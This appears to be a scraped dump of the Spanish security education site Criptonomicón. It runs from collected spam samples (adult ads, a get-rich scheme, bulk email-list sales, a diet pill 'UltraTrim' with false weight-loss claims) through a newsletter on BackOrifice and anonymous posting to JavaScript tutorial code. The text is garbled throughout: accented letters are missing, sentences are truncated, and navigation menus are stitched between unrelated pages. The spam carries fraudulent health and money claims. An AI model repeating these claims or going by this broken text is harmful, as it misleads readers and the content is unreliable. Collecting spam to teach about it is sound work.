WE HONOR ALL REMOVE REQUESTS!! JUST MAIL YOUR REQUESTS TO:
jackpotx@ix.netcom.com
======================================
************************************************************************************************
>>Young Hot Girls New Sites
file:///C|/TEMP/criptonomicon/criptonomicon/spam/ejemplo.txt
I have listed my top three adult sites for your enjoyment!!!
Can you handle 2 young, hot, sexy girls? Cum watch them at:
http://www.pinkteaze.com
http://www.livewhorehouse.com
http://www.thepinkpussyclub.com
Where you can complete their menage-a-trois.
If you have received this letter by error, we apologize for
any inconvience.The above domains have not given their consent to be listed,
nor are they affiliated in any way to this contest promotion I have simply
listed them for your enjoyment. Now, the reason I have contacted you. If you
call this number today 1-888-689-9274, and leave us your email address. We
will include you in a weekly giveaway that we are currently promoting. The
winners are selected randomly, and will receive prizes such as free
memberships to sites, dates with porn stars, your own free adult site and
much more.!!!If you would like to be removed from our list, simply call
1-888-689-9274 and state that you would liked to be removed. You will only
receive this letter once.
************************************************************************************************
START YOUR OWN FULL OR SPARE-TIME WHOLESALING BUSINESS
FROM YOUR HOME....EARN HUNDREDS A DAY WORKING AS YOUR
OWN BOSS!!
Ready to make money right from your own home? Whether you have
only ten spare hours a month, or a whole family that can devote
practically FULL TIME to your business, you can make fast, big profits.
The demand is here NOW! Sales of specialty products keep soaring
every month.
We put you right into the wholesale business----making you a vital
part of a multi-billion industry. Start in your spare time now, without
overhead. Expand to full-time when you are ready!
For More Free Details on how you can start in your own
business send 2 stamps or $1.00 to:
WHOLESALE DISTRIBUTOR
DAVID EATON
PO BOX 192892
LITTLE ROCK AR 72219
--------------------------------------------------------------------------------------Do not hit reply use contact info in letter!
************************************************************************************************
X-Info:
X-Info:Sent using Zen Bulk Emailer (FREE)
X-Info:See End Of Email For Free Copy And Download Address
Waiting on a Business Opportunity
THAT YOU COULD AFFORD
ONLY $25.00
Convenient Service at Substantial
Discounts
Internet Commerce
Electricity
Paging
THE
Internet Access
& Services
HOME
Cellular
Long Distance
Digital Satellite TV
Imagine Supplying Almost every service a household needs to customers with substantial
discount and receive a recurring monthly commissions on the usage of all the services
Visit website http://www.mirage-net.com/bp/1133791
file:///C|/TEMP/criptonomicon/criptonomicon/spam/ejemplo.txt
*** Get The Zen Bulk Emailer FREE - Where To Get it ***
*** FAX/CALL +1 212 2082904 (US) or FAX +44 (01772) 492507 (UK) ***
*** No Question, No Hard Sell, It's Freeware ! ***
************************************************************************************************
****
MASS EXPOSURE
****
Good question !
file:///C|/TEMP/criptonomicon/criptonomicon/spam/ejemplo.txt
FAX: 626-913-0478
TEL: 626-839-3755
HRS: 10am - 5pm
US Pacific Time
^~^~^~^~^~^~^~^~^~^~
Monday - Friday
O R D E R
F O R M
~^~^~^~^~^~^~^~^~^~^
Ref ID # 142JM5487
Name (Subscriber):__________________________________________
Company:_________________________________Position:__________
Phone #:_______________________Fax #:_______________________
Email (MUST):_______________________________________________
**
**
**
**
**
__Visa
__Mastercard
__American Express
__Discover
Card Number:______________________________________Exp:_______
Name on Card:__________________________________Amount:_______
Signature:______________________________________Date:__________
~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~
All figures, percentages and response rates are for example
purposes only. The actual figures, percentages and response
rates may vary. The individual or group may earn less or more
than the examples provided in thi
file:///C|/TEMP/criptonomicon/criptonomicon/spam/ejemplo.txt
************************************************************************************************
This is really cool!
PREMIUM CHANNELS and PAY PER VIEW EVENTS
**** FREE ****
**
Well Tested
Throughout Europe ! **
We Have them!
We Have them!
$10.00 USD
file:///C|/TEMP/criptonomicon/criptonomicon/spam/ejemplo.txt
$16.99 USD
$
************************************************************************************************
DONT MISS OUT! New Email Addresses 6-5-98
You Can Reach 50,000 People for only $29.00
I learned the hard way by purchasing from those
companies that advertising millions of addresses
for little money...
I can only
to extract
them for a
source for
(6-5-98)
file:///C|/TEMP/criptonomicon/criptonomicon/spam/ejemplo.txt
CLICK REPLY AND TYPE REMOVE IN THE
BODY...
************************************************************************************************
Lose up to 48lbs in just 6 Weeks.
FREE one week supply available!
Send $1 Plus self addressed, stamped
envelope :
Ultramax, Dept50644
Jenny Ladek
9213 Pavia
St. Louis, MO 63123
THRILLING ULTRATRIM SUPER PILL
GUARANTEES RAPID WEIGHT-LOSS!
Laguna Beach, CA - There now exists, an all natural
bio-active weight-loss compound so powerful, so
effective, so relentless in its awesome attack on bulging
fatty deposits that it has virtually eliminated the need to
diet. News of this super pill from Asia is sweeping the
country. The product is called UltraTrim 2000 and it's
dynamite! In fact, thousands of people are now trying
UltraTrim and losing weight faster than ever before!
Some people reported as much as 3 Pounds the first
24 Hours!
FLUSHES CALORIES RIGHT OUT OF YOUR BODY!
UltraTrim ingredients were developed in Asia by
medical researchers. The product contains no drugs
whatsoever. It's ingredients are derived from plants
that grow primarily in Southern Asia. The technical name
is HCA.
EAT ALL YOU WANT AND STILL LOSE WEIGHT
(PILL DOES ALL THE WORK)
Why HCA? For years it was a widely held belief
that the HCA plant extracts had magical properties. When
a person ate a small amount of this delicious plant extract
he would miraculously lose weight! The researchers
investigated this phenomenon and discovered, through
sophisticated testing, that the plant extract did indeed
cause rapid weight-loss.
COMPANY OFFERS EXTRAORDINARY GUARANTEE
By Now it should be obvious the UltraTrim is no
ordinary diet pill. Unlike other diet programs, once you've
taken Ultratrim there is really nothing else to do. You'll
marvel at the way UltraTrim literally reverses years of
over eating. You need only follow the simple instructions.
Thats It! You can continue to enjoy those foods you love
to eat. UltraTrim simpy does not allow your body to absorb
excess calories. Period!
Ultramax is the only company in the United States
authorized to sell UltraTrim. They have tested the product
thoroughly and are convinced that with UltraTrim you can
achieve the body of your dreams. They dont care if you've
tried to lose weight before and failed. They have
documented the results of skeptical people who now
swear by UltraTrim. Ultramax means it when they say you
can lose a maximum amount of fat in record time.
WE ARE SUPPORTERS OF RESPONSIBLE EMAIL MARKETING.
IF YOU DONT WANT TO RECEIVE ANY COMMERCIAL EMAILS.
PLEASE CLICK REPLY AND TYPE REMOVE.
file:///C|/TEMP/criptonomicon/criptonomicon/spam/anuncio.txt
less.
organizations,
not
nobody can.
***********************************************
***********************************************
Aqu tenis otro anuncio de lo mismo
***********************************************
***********************************************
57 MILLION EMAIL ADDRESSES FOR ONLY $99
You want to make some money?
I can put you in touch with over 50 million people at virtually no cost.
Can you make one cent from each of theses names?
If you can you have a profit of over $500,000.00
That's right, I have 57 Million Fresh email
addresses that I will sell for only $99. These are all
fresh addresses that include almost every person
on the Internet today, with no duplications. They are
all sorted and ready to be mailed. That is the best
deal anywhere today ! Imagine selling a product for
file:///C|/TEMP/criptonomicon/criptonomicon/spam/anuncio.txt
file:///C|/TEMP/criptonomicon/criptonomicon/spam/anuncio.txt
file:///C|/TEMP/criptonomicon/criptonomicon/spam/anuncio.txt
Intimidad?
Agujero de Ciucci
Artculos
Seguridad
Linux
Pgina de Microsoft
Navegacin segura
Control de acceso
CGI
Java
JavaScript
Cookies
Crashes
IE/Powerpoint Bug
MSBC Top Story; The MsIE Bug Secret
Welcome to the Microsoft Security Advisor
WinFiles.com Security Bugs and Fixes
Versiones locales de algunos de estos agujeros
Agujeros
Remailers
Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Anonimato
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.
Correo seguro
Web seguro
Referencias
Libro de Visitas
Intimidad?
Artculos
Seguridad
Linux
Navegacin segura
Control de acceso
CGI
Cache compartido
Los agujeros de Guninsky
Tu-cow: navegacin al descubierto
DigiCrime
Netscape (in)Security (problems)
Netscape Security Solutions
Crash Warning -- Your browser will crash crash
crash crash crash crash crash crash crash crash
crash crash crash
Java
Cookies
Crashes
Agujeros
Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.
Spam
Remailers
Anonimato
Correo seguro
Web seguro
Referencias
Libro de Visitas
file:///C|/TEMP/criptonomicon/criptonomicon/boletines/boletin25.txt
file:///C|/TEMP/criptonomicon/criptonomicon/boletines/boletin25.txt
file:///C|/TEMP/criptonomicon/criptonomicon/boletines/boletin25.txt
http://www.news.com/News/Item/0,4,28010,00.html
******************************************
4. Alarma de BackOriffice
BackOriffice est de actualidad. Pero qu es? En qu consiste? Qu
amenazas representa?
Encontraris respuesta a estos interrogantes en las siguientes pginas de La
Brjula:
http://labrujula.net/ventana_inf/esp-bo.htm
******************************************
Candados, cortafros y otras herramientas
******************************************
5. Correos certificados
Certifiedemail.com es una aplicacin para correo electrnico que ofrece la
seguridad de que los mensajes son enviados, ya que el emisor recibe una
notificacin tan pronto como el destinatario lo recibe. Adems cuenta con la
capacidad de comunicarse en un entorno seguro, ya que se enva y recibe el
correo cifrado.
Sirve tambin como cierta garanta contra los virus, en la medida en que los
mensajes son escaneados antes de ser almacenados en el sistema.
Lo encontraris en:
http://www.certifiedemail.com/
******************************************
Parada y fonda
******************************************
6. Vulnerabilidades
La mayor recopilacin de vulnerabilidades y exploits (maneras de explotar
tales vulnerabilidades) en Internet, la encontraris en:
http://www.rootshell.com/
******************************************
Consejos y trucos
******************************************
7. Cmo escribir annimamente en las news
Ms de uno me habis preguntado cmo se puede hacer para enviar noticias
annimamente. Bien, como ya anunci en el boletn nmero 2, DejaNews ha
lanzado un servicio de participacin annima en las news, que tras
registrarnos, nos permitir enviar de manera completamente annima noticias
en cualquiera de los innumerables grupos de noticias.
Las instrucciones paso a paso para registrarse y enviar noticias
annimamente los podis encontrar en la pginas de DejaNews en:
http://www.dejanews.com/post.xp
******************************************
Cursos en el Criptonomicn
file:///C|/TEMP/criptonomicon/criptonomicon/boletines/boletin25.txt
******************************************
8. Diferencias entre GET y POST
GET o POST? He ah la cuestin. Si alguna vez habis trabajado con
formularios, os habris hecho esa pregunta. Qu mtodo de envo utilizo?
Cul es mejor, ms seguro, ms rpido?
La respuesta en esta nueva adicin al curso sobre seguridad en CGI, en:
http://www.iec.csic.es/criptonomicon/cgi/datos.html
******************************************
Hablan los expertos
******************************************
9. El Comercio Electrnico
Esta semana contamos con la colaboracin de Miguel ngel Sarasa Lpez
(msarasa@posta.unizar.es), criptlogo de la Universidad de Zaragoza,
co-autor del libro "Criptografa Digital, Fundamentos y Aplicaciones",
editado por Prensas Universitarias de Zaragoza este ao. Ha escrito en
exclusiva para el Criptonomicn un artculo sobre la realidad actual del
comercio electrnico, los retos a los que se enfrenta y las soluciones que
se estn adoptando.
El Comercio Electrnico
Hasta no hace demasiado tiempo la interaccin social a nivel comercial se
efectuaba cara a cara, por telfono o bien por correo postal. Sin embargo,
gracias a las innovaciones tcnicas acontecidas en los ltimos aos, se ha
producido el nacimiento de un nuevo tipo de comercio, el denominado comercio
electrnico.
El comercio electrnico es un servicio de la tecnologa que permite la
realizacin de operaciones de negocios y la compraventa de bienes y
servicios mediante la utilizacin de sistemas electrnicos, como por ejemplo
los ordenadores personales, hoy ya tan habituales en muchos hogares. En
definitiva, este nuevo mercado electrnico nos permite tener en nuestro
domicilio una gran galera comercial por la que podemos pasear de forma
fcil y rpida con el ratn de nuestro ordenador, y todo ello sin movernos
de casa.
El comercio electrnico no es algo totalmente nuevo, si se tiene en cuenta
que desde hace ya ms de una dcada existe un protocolo denominado EDI
(Electronic Data Interchange) para el intercambio electrnico de documentos.
Existen muchas otras variantes de comercio electrnico, como por ejemplo el
denominado home-banking, que permite al usuario realizar operaciones en sus
cuentas bancarias igualmente desde su ordenador personal.
Todo lo anterior se hace posible gracias a la existencia de grandes redes
digitales de comunicacin a nivel mundial, que facilitan las transacciones
entre las partes implicadas. Entre ellas merece especial mencin la red
Internet, la cual da cobertura a millones de usuarios: personas, negocios,
empresas, revistas y todo tipo de sociedades.
Las ventajas del comercio electrnico son evidentes. El comprador puede ver
de manera rpida todo el escaparate electrnico y no tiene que ir tienda por
tienda en busca del producto deseado. Se optimiza tambin el tiempo de
atencin al cliente, que no tiene que esperar largas colas para ser
atendido. Por su parte, el vendedor tambin se beneficia, puesto que puede
file:///C|/TEMP/criptonomicon/criptonomicon/boletines/boletin25.txt
file:///C|/TEMP/criptonomicon/criptonomicon/boletines/boletin25.txt
file:///C|/TEMP/criptonomicon/criptonomicon/boletines/boletin25.txt
Marcado de Datos
Suscripcin gratis
Intimidad?
Artculos
Seguridad
Linux
Navegacin segura
Control de acceso
CGI
Java
JavaScript
Cookies
Crashes
Agujeros
Spam
Remailers
Anonimato
Correo seguro
Web seguro
Referencias
Libro de Visitas
Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.
Pgina inocente
Esta podra ser una pgina inocente a la que t accedes desde alguna otra de mi Web. Aqu el frame de
arriba es tan grande que lo puedes ver, pero podra hacerlo tan pequeo que no apreciases su presencia.
Desde el frame de arriba podra ir monitorizando tu actividad o incluso obligarte a abrir pginas en otros
frames invisibles con datos de tu disco duro, tu historial de navegacin, etc.
Desde aqu puedes acceder a otras pginas, y jugando con los botones del frame de arriba y en el
elemento desplegable de navegacin, puedes comprobar lo que est permitido y lo que no.
Pgina de Gonzalo
Criptonomicn
Intimidad?
Artculos
Si tienes encendido el altavoz, habrs notado una molestia, verdad? Lo mejor es que
te persigue all donde vayas, aunque cierres esta ventana se seguir oyendo si tienes
otras abiertas. La nica forma de escapar del feroz perro es cerrar el navegador (o
apagar el altavoz). Estrictamente hablando, esta applet de Java no cuelga tu
navegador, pero te obliga a cerrarlo (o a prescindir de los altavoces). Si usas un
escritorio integrado con el navegador, la nica forma de librarte del ruido es... cerrar
el ordenador o apagar el altavoz! He aqu un sencillo ejemplo de applet maliciosa.
Seguridad
Linux
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Navegacin segura
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.
Control de acceso
CGI
Java
JavaScript
Cookies
Crashes
Agujeros
Spam
Remailers
Anonimato
Correo seguro
Web seguro
Referencias
Libro de Visitas
No te das cuenta de nada, verdad? En cualquier caso ya es tarde y tendrs que cerrar
esta ventana de tu navegador (si puedes).
No debes de tener Java instalado. Qu aburrido eres!
Intimidad?
Artculos
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Seguridad
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.
Linux
Navegacin segura
Control de acceso
CGI
Java
JavaScript
Cookies
Crashes
Agujeros
Spam
Remailers
Anonimato
Correo seguro
Web seguro
Referencias
Libro de Visitas
Colgando el navegador
No te das cuenta de nada, verdad? En cualquier caso ya es tarde y tendrs que cerrar
esta ventana de tu navegador.
No debes de tener Java instalado. Qu aburrido eres!
Intimidad?
Artculos
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Seguridad
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.
Linux
Navegacin segura
Control de acceso
CGI
Java
JavaScript
Cookies
Crashes
Agujeros
Spam
Remailers
Anonimato
Correo seguro
Web seguro
Colgando el navegador
Consejos prcticos
Referencias
Libro de Visitas
Intimidad?
Artculos
Seguridad
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Linux
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.
Navegacin segura
Control de acceso
CGI
Java
JavaScript
Cookies
Crashes
Agujeros
Spam
Remailers
Anonimato
Correo seguro
Web seguro
Referencias
Libro de Visitas
Suscripcin gratis
Intimidad?
Artculos
Seguridad
Linux
Aadir JavaScript a
una pgina
Control de acceso
Escribir en la ventana
actual
Validar formularios
CGI
Java
JavaScript
Cookies
Crashes
<SCRIPT LANGUAGE="JavaScript">
<!-- Cdigo en JavaScript //-->
</SCRIPT>
Cuando el navegador va interpretando la pgina en HTML, al
llegar a esta etiqueta sabe que lo que est encerrado entre
<SCRIPT> y </SCRIPT> constituye cdigo JavaScript y lo
ejecutar como corresponda. Cuando se crean funciones y
variables que se utilizan en varios puntos de la pgina web, se
suelen definir al principio de la pgina, entre las etiquetas
<HEAD>.
Cambiar imgenes
dinmicamente
Clculos matemticos
Cookies
La barra de estado
Men de navegacin
Agujeros
Como un URL
Spam
Remailers
Anonimato
En respuesta a eventos
Correo seguro
Web seguro
Referencias
Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Libro de Visitas
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
.
Suscripcin gratis
Intimidad?
Artculos
Seguridad
Linux
Navegacin segura
Control de acceso
CGI
Java
JavaScript
Cookies
Crashes
Agujeros
Validar formularios
Cambiar imgenes
dinmicamente
Clculos matemticos
Cookies
La barra de estado
Men de navegacin
Spam
Por ltimo, se puede hacer que al pulsar un botn presente en la pgina web (es decir,
en respuesta al evento onClick del botn), aparezca igualmente la consabida ventana:
Remailers
Anonimato
Correo seguro
Adems de las ventanas de alerta, JavaScript proporciona otros dos tipos ms, que
permiten interactuar con el visitante:
Web seguro
Referencias
confirm presenta una ventana con un mensaje y dos botones, Aceptar y Cancelar,
que el usuario pulsar en funcin del contenido del mensaje. Si el usuario pulsa
Aceptar, confirm devuelve un valor Verdadero (TRUE), mientras que si pulsa
Cancelar, devuelve un valor Falso (FALSE), que puede ser utilizado por el guin en
JavaScript para decidir que accin ejecutar a continuacin.
Libro de Visitas
if (confirm('Desea continuar?'))
// se ejecuta una accin
else
// se ejecuta otra
Tambin es posible abrir nuevas ventanas del navegador con el mtodo open del
objeto window:
nuevaVentana=window.open("ventananav.html");
donde nuevaVentana es el identificador de un nuevo objeto window que identifica a
la ventana recin creada, en la que se habr cargado la pgina ventananav.html.
Algunos de los parmetros que se pueden controlar al abrir la nueva ventana, cuyos
posibles valores pueden ser yes o no, son:
directories: si su valor es yes, crea los botones de directorio estndar del
navegador, tales como What's New y What's Cool en Netscape.
height: especifica la altura en pixels de la ventana creada.
menubar: si su valor es yes, crea una barra de men en la parte superior de la
ventana.
resizable: si su valor es yes, permite al usuario cambiar el tamao de la
ventana.
scrollbars: si su valor es yes, crea barras de desplazamiento vertical y
horizontal cuando el tamao del documento sea mayor que el de la ventana.
status: si su valor es yes, crea una barra de estado en la parte inferior de la
ventana.
toolbar: si su valor es yes, crea una barra de herramientas estndar con
botones.
width: especifica la anchura en pixels de la ventana creada.
A su vez, las ventanas se pueden cerrar utilizando cualquiera de los siguientes tres
mtodos:
window.close()
self.close()
close()
Eso s, el ltimo de ellos no debe usarse en un gestor de eventos. As, por ejemplo,
para cerrar la ventana anterior, podra hacerse:
nuevaVentana.close();
Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
.
Suscripcin gratis
Intimidad?
Artculos
Seguridad
Linux
Navegacin segura
Control de acceso
CGI
Java
JavaScript
Validar formularios
Cambiar imgenes
dinmicamente
Clculos matemticos
Cookies
Cookies
Crashes
Agujeros
La barra de estado
Men de navegacin
Remailers
Anonimato
Spam
Correo seguro
Web seguro
Referencias
Libro de Visitas
function fechahoy() {
var diasemana = new Array('Domingo', 'Lunes',
'Martes', 'Mircoles', 'Jueves', 'Viernes', 'Sbado');
var nombremes = new Array('enero', 'febrero', 'marzo',
'abril', 'mayo', 'junio', 'julio', 'agosto',
'septiembre', 'octubre', 'noviembre', 'diciembre');
var ahora;
var fecha = new Date();
var anio = fecha.getYear();
var mes = fecha.getMonth();
var dia = fecha.getDay();
var num = fecha.getDate();
ahora = diasemana[dia] + ", " + num + " " +
nombremes[mes] + " " + anio;
return ahora;
}
Esta funcin devuelve una cadena con el da de la semana, seguido del da del mes, el
mes y el ao. La funcin se puede invocar en cualquier lugar de la pgina web y
presentar su salida utilizando el mtodo write del objeto document:
document.write( "Hoy es " + fechahoy() );
Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
.
Suscripcin gratis
Intimidad?
Artculos
Seguridad
Linux
Navegacin segura
Control de acceso
CGI
Java
JavaScript
Cookies
Crashes
Agujeros
Spam
Remailers
Anonimato
Correo seguro
Web seguro
Validar formularios
Los formularios representan una forma rpida y eficaz de enviar
informacin desde el ordenador del usuario hasta el servidor web.
Generalmente, constan de varios campos de texto, botones de
seleccin y listas desplegables, que el usuario rellena
convenientemente y transmite al servidor pulsando finalmente en
un botn de envo. A menudo, muchos de los campos que el
usuario debe completar obedecen a un formato determinado, por
lo que conviene que el usuario los rellene correctamente para
evitar errores al procesar en el servidor los datos recibidos.
JavaScript constituye una manera muy conveniente de trasladar
esta labor de validacin de la informacin al ordenador del cliente,
descargando as al servidor de esta tarea.
Clculos matemticos
pgina
Validar formularios
Cambiar imgenes
dinmicamente
Cookies
La barra de estado
Men de navegacin
En primer lugar, se crea el formulario de manera normal, usando las etiquetas HTML
convencionales. En la pgina de ejemplo aparece el formulario cuyo cdigo se lista a
continuacin:
<form method = "POST" name = "registro" onSubmit =
"return validar(this)" action = "formularios.asp">
Nombre: <input type="text" name="nombre" size="20">
Edad: <input type="text" name="edad" size="2">
Direccin de correo: <input type="text" name="correo"
size="20">
<input type="submit" value="Enviar datos" name="enviar">
</form>
Referencias
Libro de Visitas
que consta de tres campos de entrada y un botn para enviar los datos. Se ha aadido
el evento onSubmit, que se produce cuando el usuario pulsa el botn Enviar datos, de
manera que se invoca a la funcin validar antes de transmitir nada. El argumento que
toma es this, es decir, el propio formulario. A continuacin se presenta el cdigo de
dicha funcin:
function validar(formulario) {
if (formulario.nombre.value.length < 4) {
alert("Escriba por lo menos 4 caracteres en el campo
\"Nombre\".");
formulario.nombre.focus();
return (false);
}
var checkOK = "ABCDEFGHIJKLMNOPQRSTUVWXYZ" +
"abcdefghijklmnopqrstuvwxyz ";
var checkStr = formulario.nombre.value;
var allValid = true;
for (i = 0; i < checkStr.length; i++) {
ch = checkStr.charAt(i);
for (j = 0; j < checkOK.length; j++)
if (ch == checkOK.charAt(j))
break;
if (j == checkOK.length) {
allValid = false;
break;
}
}
if (!allValid) {
alert("Escriba slo letras en el campo
\"Nombre\".");
formulario.nombre.focus();
return (false);
}
var checkOK = "0123456789";
var checkStr = formulario.edad.value;
var allValid = true;
var decPoints = 0;
var allNum = "";
for (i = 0; i < checkStr.length; i++) {
ch = checkStr.charAt(i);
for (j = 0; j < checkOK.length; j++)
if (ch == checkOK.charAt(j))
break;
if (j == checkOK.length) {
allValid = false;
break;
}
allNum += ch;
}
if (!allValid) {
alert("Escriba slo dgitos en el campo \"Edad\".");
formulario.edad.focus();
return (false);
}
var chkVal = allNum;
var prsVal = parseInt(allNum);
if (chkVal != "" && !(prsVal >= "18" && prsVal <=
"30")) {
alert("Escriba un valor mayor o igual que 18 y menor
o igual que 30 en el campo \"Edad\".");
formulario.edad.focus();
return (false);
}
if ((formulario.correo.value.indexOf ('@', 0) ==
-1)||(formulario.correo.value.length < 5)) {
alert("Escriba una direccin de correo vlida en el
campo \"Direccin de correo\".");
return (false);
}
return (true);
}
Esta funcin realiza las siguientes comprobaciones:
1. La longitud del nombre es mayor de cuatro caracteres.
2. El nombre slo contiene caracteres del alfabeto espaol, no contiene nmeros
ni caracteres no alfanumricos.
3. La edad slo contiene nmeros.
4. El valor de la edad est comprendido entre 18 y 30.
5. La direccin de correo incluye una arroba y su longitud es superior a cinco
caracteres.
Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
.
Suscripcin gratis
Intimidad?
Artculos
Seguridad
Linux
Navegacin segura
Control de acceso
CGI
Java
JavaScript
Cookies
Validar formularios
Cambiar imgenes
dinmicamente
Clculos matemticos
Cookies
La barra de estado
Crashes
Agujeros
Spam
Men de navegacin
Remailers
Anonimato
Correo seguro
Web seguro
document.images["castillo"]
Cuando se generan los efectos de cambio de imagen, deben cargarse adems de las
imgenes que ya estn en la pgina, las que las sustituirn cuando el ratn pase sobre
ellas. Para ello se utiliza lo que se llama precarga de imgenes: cargar una imagen en
el cach de manera que cuando sea necesaria se visualice inmediatamente en la
pgina. La precarga se realiza antes de cargar los contenidos del documento, entre las
etiquetas <HEAD>:
Referencias
Libro de Visitas
document.images[boton].src = boton1_on.src;
}
}
}
// Carga de imagen cuando el ratn abandona el rea de
la imagen
function sale(boton) {
if (document.images) {
if (boton == 'boton1') {
document.images[boton].src = boton1_off.src;
}
}
}
//--> </script>
</head>
<body>
<p><
a href = "suscripcion.html" onMouseOver =
"entra('boton1');" onMouseOut = "sale('boton1');"><img
src="imagenes/boton1.gif" alt="Presentacin" border="0"
name="boton1" WIDTH="150" HEIGHT="30"></a> </p>
</body>
</html>
Este proceso puede repetirse para tantas imgenes como aparezcan en la pgina web.
En la figura ms abajo se muestra el resultado.
Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
.
Suscripcin gratis
Intimidad?
Artculos
Seguridad
Linux
Navegacin segura
Control de acceso
Math.sin(3*Math.PI/4);
Math.cos(3*Math.PI/4);
Java
JavaScript
Cookies
Crashes
Agujeros
Spam
Remailers
pgina
actual
Validar formularios
Cambiar imgenes
dinmicamente
Clculos matemticos
Cookies
La barra de estado
Men de navegacin
Anonimato
Correo seguro
Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Web seguro
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
.
Referencias
Libro de Visitas
Suscripcin gratis
Intimidad?
Artculos
Seguridad
Linux
Navegacin segura
Control de acceso
CGI
Java
Validar formularios
Cambiar imgenes
dinmicamente
JavaScript
Cookies
Crashes
Agujeros
Spam
Remailers
Clculos matemticos
Cookies
La barra de estado
Men de navegacin
Como ejemplo, puede comprobarse en esta misma pgina cmo al deslizar el ratn
sobre los enlaces del recuadro colorado de la derecha, cambian los mensajes que
aparecen en la barra de estado.
Anonimato
Correo seguro
Web seguro
Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
.
Referencias
Libro de Visitas
Men de navegacin
Suscripcin gratis
Intimidad?
Artculos
Seguridad
Linux
Navegacin segura
Control de acceso
CGI
Java
JavaScript
Cookies
Crashes
Agujeros
Men de navegacin
Una aplicacin que puede resultar muy til es construir una ayuda
a la navegacin utilizando para ello un men desplegable donde se
encuentran las opciones a las que se puede acudir.
En un sitio web muy grande o cuando hay que elegir en una lista
interminable de artculos, el men desplegable puede suponer la
forma ms cmoda y elegante de acometer la tarea de ofrecer una
navegacin clara e intuitiva.
Para realizarla se utiliza el objeto SELECT y el evento onChange,
de la siguiente manera:
<select onChange="location.href =
this.options[this.selectedIndex].value"
size = "1" name = "navegador">
<option value = ".">Elige pgina</option>
<option value =
"calculadora.html">calculadora</option>
<option value =
"javascript.html">javascript</option>
</select>
Validar formularios
Cambiar imgenes
dinmicamente
Clculos matemticos
Cookies
La barra de estado
Men de navegacin
Quiero ir a:
Spam
Remailers
Anonimato
Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Correo seguro
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Web seguro
Men de navegacin
Consejos prcticos
Referencias
Libro de Visitas
Suscripcin gratis
Intimidad?
Artculos
Ejemplo de formulario
Seguridad
Linux
Edad
